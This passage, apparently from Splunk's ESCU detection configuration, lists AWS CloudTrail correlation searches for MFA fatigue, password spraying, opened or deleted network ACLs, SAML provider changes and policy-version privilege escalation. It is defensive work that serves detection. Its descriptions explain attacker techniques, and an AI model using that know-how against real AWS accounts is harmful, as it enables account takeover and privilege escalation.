Console for a single user. AWS Cloudtrail logs provide a a very useful field called `additionalEventData` that logs information regarding usage of MFA. Specifically, the analytic triggers when more than 10 MFA user prompts fail within 10 minutes. AWS Environments can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.escu.how_to_implement = The Splunk AWS Add-on is required to utilize this data. The search requires AWS Cloudtrail logs. action.escu.known_false_positives = Multiple Failed MFA requests may also be a sign of authentication or application issues. Filter as needed. action.escu.creation_date = 2022-10-03 action.escu.modification_date = 2022-10-03 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Multiple Failed MFA Requests For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user_name$ is seen to have high number of MFA prompt failures within a short period of time. action.risk.param._risk = [{"risk_object_field": "user_name", "risk_object_type": "user", "risk_score": 64}, {"threat_object_field": "src", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Multiple Failed MFA Requests For User - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1621"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName= ConsoleLogin "additionalEventData.MFAUsed"=Yes errorMessage="Failed authentication" | bucket span=5m _time | stats dc(_raw) as mfa_prompts values(userAgent) as userAgent values(src) as src by _time user_name user_arn aws_account_id eventName errorMessage | where mfa_prompts > 10| `aws_multiple_failed_mfa_requests_for_user_filter` [ESCU - AWS Multiple Users Failing To Authenticate From Ip - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies one source Ip failing to authenticate into the AWS Console with 30 unique valid users within 10 minutes. This behavior could represent an adversary performing a Password Spraying attack against an AWS environment tenant to obtain initial access or elevate privileges. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies one source Ip failing to authenticate into the AWS Console with 30 unique valid users within 10 minutes. This behavior could represent an adversary performing a Password Spraying attack against an AWS environment tenant to obtain initial access or elevate privileges. action.escu.how_to_implement = You must install Splunk Add-on for AWS in order to ingest Cloudtrail. We recommend the users to try different combinations of the bucket span time and the tried account threshold to tune this search according to their environment. action.escu.known_false_positives = No known false postives for this detection. Please review this alert action.escu.creation_date = 2022-09-27 action.escu.modification_date = 2022-09-27 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Multiple Users Failing To Authenticate From Ip - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover", "Compromised User Account"] action.risk = 1 action.risk.param._risk_message = Multiple failed console login attempts against users $tried_accounts$ seen from $src_ip$ action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "tried_accounts", "risk_object_type": "user", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Multiple Users Failing To Authenticate From Ip - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover", "Compromised User Account"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=ConsoleLogin action=failure | bucket span=10m _time | stats dc(user_name) AS unique_accounts values(user_name) as tried_accounts by _time, src_ip, eventName, action, user_agent | where unique_accounts > 30 |`aws_unusual_number_of_failed_authentications_from_ip_filter` [ESCU - AWS Network Access Control List Created with All Open Ports - Rule] action.escu = 0 action.escu.enabled = 1 description = The search looks for AWS CloudTrail events to detect if any network ACLs were created with all the ports open to a specified CIDR. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The search looks for AWS CloudTrail events to detect if any network ACLs were created with all the ports open to a specified CIDR. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS, version 4.4.0 or later, and configure your AWS CloudTrail inputs. action.escu.known_false_positives = It's possible that an admin has created this ACL with all ports open for some legitimate purpose however, this should be scoped and not allowed in production environment. action.escu.creation_date = 2021-01-11 action.escu.modification_date = 2021-01-11 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Network Access Control List Created with All Open Ports - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Network ACL Activity"] action.risk = 1 action.risk.param._risk_message = User $user_arn$ has created network ACLs with all the ports open to a specified CIDR $requestParameters.cidrBlock$ action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Network Access Control List Created with All Open Ports - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Network ACL Activity"], "cis20": ["CIS 13"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search looks for AWS CloudTrail events to detect if any network ACLs were created with all the ports open to a specified CIDR. action.notable.param.rule_title = AWS Network Access Control List Created with All Open Ports action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=CreateNetworkAclEntry OR eventName=ReplaceNetworkAclEntry requestParameters.ruleAction=allow requestParameters.egress=false requestParameters.aclProtocol=-1 | append [search `cloudtrail` eventName=CreateNetworkAclEntry OR eventName=ReplaceNetworkAclEntry requestParameters.ruleAction=allow requestParameters.egress=false requestParameters.aclProtocol!=-1 | eval port_range='requestParameters.portRange.to' - 'requestParameters.portRange.from' | where port_range>1024] | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by userName user_arn userIdentity.principalId eventName requestParameters.ruleAction requestParameters.egress requestParameters.aclProtocol requestParameters.portRange.to requestParameters.portRange.from src userAgent requestParameters.cidrBlock | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `aws_network_access_control_list_created_with_all_open_ports_filter` [ESCU - AWS Network Access Control List Deleted - Rule] action.escu = 0 action.escu.enabled = 1 description = Enforcing network-access controls is one of the defensive mechanisms used by cloud administrators to restrict access to a cloud instance. After the attacker has gained control of the AWS console by compromising an admin account, they can delete a network ACL and gain access to the instance from anywhere. This search will query the AWS CloudTrail logs to detect users deleting network ACLs. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = Enforcing network-access controls is one of the defensive mechanisms used by cloud administrators to restrict access to a cloud instance. After the attacker has gained control of the AWS console by compromising an admin account, they can delete a network ACL and gain access to the instance from anywhere. This search will query the AWS CloudTrail logs to detect users deleting network ACLs. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. action.escu.known_false_positives = It's possible that a user has legitimately deleted a network ACL. action.escu.creation_date = 2021-01-12 action.escu.modification_date = 2021-01-12 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Network Access Control List Deleted - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Network ACL Activity"] action.risk = 1 action.risk.param._risk_message = User $user_arn$ from $src$ has sucessfully deleted network ACLs entry (eventName= $eventName$), such that the instance is accessible from anywhere action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 5}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Network Access Control List Deleted - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Network ACL Activity"], "cis20": ["CIS 13"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=DeleteNetworkAclEntry requestParameters.egress=false | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by user_arn userIdentity.principalId eventName requestParameters.egress src userAgent | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `aws_network_access_control_list_deleted_filter` [ESCU - AWS New MFA Method Registered For User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the registration of a new Multi Factor authentication method for an AWS account. Adversaries who have obtained unauthorized access to an AWS account may register a new MFA method to maintain persistence. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556", "T1556.006"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the registration of a new Multi Factor authentication method for an AWS account. Adversaries who have obtained unauthorized access to an AWS account may register a new MFA method to maintain persistence. action.escu.how_to_implement = You must install Splunk AWS add on and Splunk App for AWS. This search works when AWS CloudTrail logs. action.escu.known_false_positives = Newly onboarded users who are registering an MFA method for the first time will also trigger this detection. action.escu.creation_date = 2023-01-31 action.escu.modification_date = 2023-01-31 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS New MFA Method Registered For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"] action.risk = 1 action.risk.param._risk_message = A new virtual device $virtualMFADeviceName$ is added to user $user_arn$ action.risk.param._risk = [{"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 64}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS New MFA Method Registered For User - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556", "T1556.006"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the registration of a new Multi Factor authentication method for an AWS account. Adversaries who have obtained unauthorized access to an AWS account may register a new MFA method to maintain persistence. action.notable.param.rule_title = AWS New MFA Method Registered For User action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=CreateVirtualMFADevice | stats count values(requestParameters.virtualMFADeviceName) as virtualMFADeviceName min(_time) as firstTime max(_time) as lastTime by eventSource aws_account_id errorCode userAgent eventID awsRegion userIdentity.principalId user_arn src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_new_mfa_method_registered_for_user_filter` [ESCU - AWS Password Policy Changes - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events where a user is making successful API calls to view/update/delete the existing password policy in an AWS organization. It is unlikely for a regular user to conduct this operation. These events may potentially be malicious, adversaries often use this information to gain more understanding of the password defenses in place and exploit them to increase their attack surface when a user account is compromised. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events where a user is making successful API calls to view/update/delete the existing password policy in an AWS organization. It is unlikely for a regular user to conduct this operation. These events may potentially be malicious, adversaries often use this information to gain more understanding of the password defenses in place and exploit them to increase their attack surface when a user account is compromised. action.escu.how_to_implement = You must install Splunk AWS Add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately triggered an AWS audit tool activity which may trigger this event. action.escu.creation_date = 2023-01-26 action.escu.modification_date = 2023-01-26 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Password Policy Changes - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS IAM Privilege Escalation", "Compromised User Account"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Password Policy Changes - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation", "Compromised User Account"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName IN ("UpdateAccountPasswordPolicy","GetAccountPasswordPolicy","DeleteAccountPasswordPolicy") errorCode=success | stats count values(eventName) as eventName values(userAgent) min(_time) as firstTime max(_time) as lastTime by eventSource aws_account_id errorCode awsRegion userIdentity.principalId user_arn src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_password_policy_changes_filter` [ESCU - AWS S3 Exfiltration Behavior Identified - Rule] action.escu = 0 action.escu.enabled = 1 description = This correlation search looks at the risk events created by the detection analytics related Collection and Exfiltration techniques used by adversaries. The rule is designed to identify instances where 2 or more analytics unique AWS analytics and 2 or more distinct mitre IDs has triggered for a particular risk object. This alert when triggered may indicate a potential exfiltration in progress. By aggregating these analytics, security teams can swiftly respond to and investigate any suspicious activities, enhancing their ability to protect critical assets and prevent unauthorized access to sensitive information. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.AE"]} action.escu.data_models = ["Risk"] action.escu.eli5 = This correlation search looks at the risk events created by the detection analytics related Collection and Exfiltration techniques used by adversaries. The rule is designed to identify instances where 2 or more analytics unique AWS analytics and 2 or more distinct mitre IDs has triggered for a particular risk object. This alert when triggered may indicate a potential exfiltration in progress. By aggregating these analytics, security teams can swiftly respond to and investigate any suspicious activities, enhancing their ability to protect critical assets and prevent unauthorized access to sensitive information. action.escu.how_to_implement = You must enable all the detection searches in the Data Exfiltration Analytic story to create risk events in Enterprise Security. action.escu.known_false_positives = alse positives may be present based on automated tooling or system administrators. Filter as needed. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS S3 Exfiltration Behavior Identified - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Cloud Instance Activities", "Data Exfiltration"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - RIR - AWS S3 Exfiltration Behavior Identified - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Instance Activities", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.AE"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This correlation search looks at the risk events created by the detection analytics related Collection and Exfiltration techniques used by adversaries. The rule is designed to identify instances where 2 or more analytics unique AWS analytics and 2 or more distinct mitre IDs has triggered for a particular risk object. This alert when triggered may indicate a potential exfiltration in progress. By aggregating these analytics, security teams can swiftly respond to and investigate any suspicious activities, enhancing their ability to protect critical assets and prevent unauthorized access to sensitive information. action.notable.param.rule_title = RBA: AWS S3 Exfiltration Behavior Identified action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count values(All_Risk.risk_message) as risk_message from datamodel=Risk.All_Risk where All_Risk.annotations.mitre_attack.mitre_tactic = "collection" OR All_Risk.annotations.mitre_attack.mitre_tactic = "exfiltration" source = *AWS* by All_Risk.risk_object | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count >= 2 and mitre_tactic_id_count>=2 | `aws_s3_exfiltration_behavior_identified_filter` [ESCU - AWS SAML Access by Provider User and Principal - Rule] action.escu = 0 action.escu.enabled = 1 description = This search provides specific SAML access from specific Service Provider, user and targeted principal at AWS. This search provides specific information to detect abnormal access or potential credential hijack or forgery, specially in federated environments using SAML protocol inside the perimeter or cloud provider. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides specific SAML access from specific Service Provider, user and targeted principal at AWS. This search provides specific information to detect abnormal access or potential credential hijack or forgery, specially in federated environments using SAML protocol inside the perimeter or cloud provider. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs action.escu.known_false_positives = Attacks using a Golden SAML or SAML assertion hijacks or forgeries are very difficult to detect as accessing cloud providers with these assertions looks exactly like normal access, however things such as source IP sourceIPAddress user, and principal targeted at receiving cloud provider along with endpoint credential access and abuse detection searches can provide the necessary context to detect these attacks. action.escu.creation_date = 2021-01-26 action.escu.modification_date = 2021-01-26 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS SAML Access by Provider User and Principal - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Cloud Federated Credential Abuse"] action.risk = 1 action.risk.param._risk_message = From IP address $sourceIPAddress$, user agent $userAgent$ has trigged an event $eventName$ for account ID $recipientAccountId$ action.risk.param._risk = [{"threat_object_field": "sourceIPAddress", "threat_object_type": "ip_address"}, {"risk_object_field": "recipientAccountId", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS SAML Access by Provider User and Principal - Rule action.correlationsearch.annotations = {"analytic_story": ["Cloud Federated Credential Abuse"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=Assumerolewithsaml | stats count min(_time) as firstTime max(_time) as lastTime by requestParameters.principalArn requestParameters.roleArn requestParameters.roleSessionName recipientAccountId responseElements.issuer sourceIPAddress userAgent | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` |`aws_saml_access_by_provider_user_and_principal_filter` [ESCU - AWS SAML Update identity provider - Rule] action.escu = 0 action.escu.enabled = 1 description = This search provides detection of updates to SAML provider in AWS. Updates to SAML provider need to be monitored closely as they may indicate possible perimeter compromise of federated credentials, or backdoor access from another cloud provider set by attacker. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search provides detection of updates to SAML provider in AWS. Updates to SAML provider need to be monitored closely as they may indicate possible perimeter compromise of federated credentials, or backdoor access from another cloud provider set by attacker. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = Updating a SAML provider or creating a new one may not necessarily be malicious however it needs to be closely monitored. action.escu.creation_date = 2021-01-26 action.escu.modification_date = 2021-01-26 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS SAML Update identity provider - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Cloud Federated Credential Abuse"] action.risk = 1 action.risk.param._risk_message = User $userIdentity.principalId$ from IP address $sourceIPAddress$ has trigged an event $eventName$ to update the SAML provider to $requestParameters.sAMLProviderArn$ action.risk.param._risk = [{"threat_object_field": "sourceIPAddress", "threat_object_type": "ip_address"}, {"risk_object_field": "userIdentity.principalId", "risk_object_type": "user", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS SAML Update identity provider - Rule action.correlationsearch.annotations = {"analytic_story": ["Cloud Federated Credential Abuse"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search provides detection of updates to SAML provider in AWS. Updates to SAML provider need to be monitored closely as they may indicate possible perimeter compromise of federated credentials, or backdoor access from another cloud provider set by attacker. action.notable.param.rule_title = AWS SAML Update identity provider action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=UpdateSAMLProvider | stats count min(_time) as firstTime max(_time) as lastTime by eventType eventName requestParameters.sAMLProviderArn userIdentity.sessionContext.sessionIssuer.arn sourceIPAddress userIdentity.accessKeyId userIdentity.principalId | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` |`aws_saml_update_identity_provider_filter` [ESCU - AWS SetDefaultPolicyVersion - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events where a user has set a default policy versions. Attackers have been know to use this technique for Privilege Escalation in case the previous versions of the policy had permissions to access more resources than the current version of the policy action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events where a user has set a default policy versions. Attackers have been know to use this technique for Privilege Escalation in case the previous versions of the policy had permissions to access more resources than the current version of the policy action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately set a default policy to allow a user to access all resources. That said, AWS strongly advises against granting full control to all AWS resources action.escu.creation_date = 2021-03-02 action.escu.modification_date = 2021-03-02 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS SetDefaultPolicyVersion - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS IAM Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = From IP address $src$, user $user_arn$ has trigged an event $eventName$ for updating the the default policy version action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS SetDefaultPolicyVersion - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for AWS CloudTrail events where a user has set a default policy versions. Attackers have been know to use this technique for Privilege Escalation in case the previous versions of the policy had permissions to access more resources than the current version of the policy action.notable.param.rule_title = AWS SetDefaultPolicyVersion action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=SetDefaultPolicyVersion eventSource = iam.amazonaws.com | stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.policyArn) as policy_arn by src requestParameters.versionId eventName eventSource aws_account_id errorCode userAgent eventID awsRegion userIdentity.principalId user_arn | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_setdefaultpolicyversion_filter` [ESCU - AWS Successful Console Authentication From Multiple IPs - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an AWS account successfully authenticating from more than one unique Ip address in the span of 5 minutes. This behavior could represent an adversary who has stolen credentials via a phishing attack or some other method and using them to access corporate online resources around the same time as a legitimate user. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1535"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an AWS account successfully authenticating from more than one unique Ip address in the span of 5 minutes. This behavior could represent an adversary who has stolen credentials via a phishing attack or some other method and using them to access corporate online resources around the same time as a legitimate user. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments. action.escu.how_to_implement = You must install Splunk AWS add on and Splunk App for AWS. This search works when AWS CloudTrail events are normalized use the Authentication datamodel. action.escu.known_false_positives = A user with successful authentication events from different Ips may also represent the legitimate use of more than one device. Filter as needed and/or customize the threshold to fit your environment. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Successful Console Authentication From Multiple IPs - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Suspicious AWS Login Activities", "Compromised User Account"] action.risk = 1 action.risk.param._risk_message = User $user_arn$ has successfully logged into the AWS Console from different IP addresses $src_ip$ within 5 mins action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 